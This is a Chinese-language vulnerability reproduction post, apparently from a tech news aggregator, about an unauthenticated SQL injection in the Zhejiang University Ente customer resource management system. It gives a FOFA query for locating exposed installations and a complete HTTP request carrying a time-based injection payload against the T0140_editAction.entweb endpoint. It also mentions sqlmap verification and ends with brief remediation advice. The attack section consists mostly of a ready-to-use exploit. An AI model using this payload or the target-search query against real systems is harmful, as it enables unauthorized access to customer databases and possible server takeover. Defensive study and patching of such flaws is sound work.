当前位置: 首页 > news >正文

浙大恩特客户资源管理系统 SQL注入漏洞复现

0x01 产品简介

  浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

0x02 漏洞概述

 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。

0x03 复现环境

FOFA:app="浙大恩特客户资源管理系统"

0x04 漏洞复现

PoC

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

延时注入

Sqlmap 验证

0x05 修复建议 

关闭互联网暴露面设置接口访问控制,对用户提交数据信息严格把关,多次筛选过滤
对用户数据内容进行加密,采用SQL语句预编译和绑定变量

http://www.lryc.cn/news/233578.html

相关文章:

  • ESP32网络开发实例-BME280传感器数据保存到InfluxDB时序数据库
  • C++中sort()函数的greater<int>()参数
  • 2024有哪些免费的mac苹果电脑内存清理工具?
  • 线性表的概念
  • 锐捷练习-ospf虚链路及rip路由相互引入
  • 【机器学习】线性回归算法:原理、公式推导、损失函数、似然函数、梯度下降
  • Word中NoteExpress不显示的问题
  • 连接池的大体介绍,常用配置及在springboot项目中的应用
  • Java之SpringCloud Alibaba【九】【Spring Cloud微服务Skywalking】
  • wpf devexpress设置行和编辑器
  • AdaBoost 算法:理解、实现和掌握 AdaBoost
  • 基于ssm+vue设备配件检修管理系统
  • Reids集群
  • 自定义指令基础
  • ​软考-高级-系统架构设计师教程(清华第2版)【第5章 软件工程基础知识(190~233)-思维导图】​
  • Oneid方案
  • 【超好用的工具库】hutool-all工具库的基本使用
  • 趣学python编程 (一、计算机基础知识科普)
  • 亚马逊云科技云存储服务指南
  • 随机链表的复制
  • 树莓派4b编译FFmpeg支持硬件编解码
  • 开启CentOS/Debian自带的TCP BBR加速
  • 视频推拉流EasyDSS直播点播平台获取指定时间快照的实现方法
  • CSS---关于font文本属性设置样式总结
  • 7、使用真机调试鸿蒙项目
  • GPT实战系列-P-Tuning本地化训练ChatGLM2等LLM模型,到底做了什么?(一)
  • 【Python】爬虫代理IP的使用+建立代理IP池
  • JS-项目实战-新增水果库存功能实现
  • mysql 常见操作指令
  • Vue3 生命周期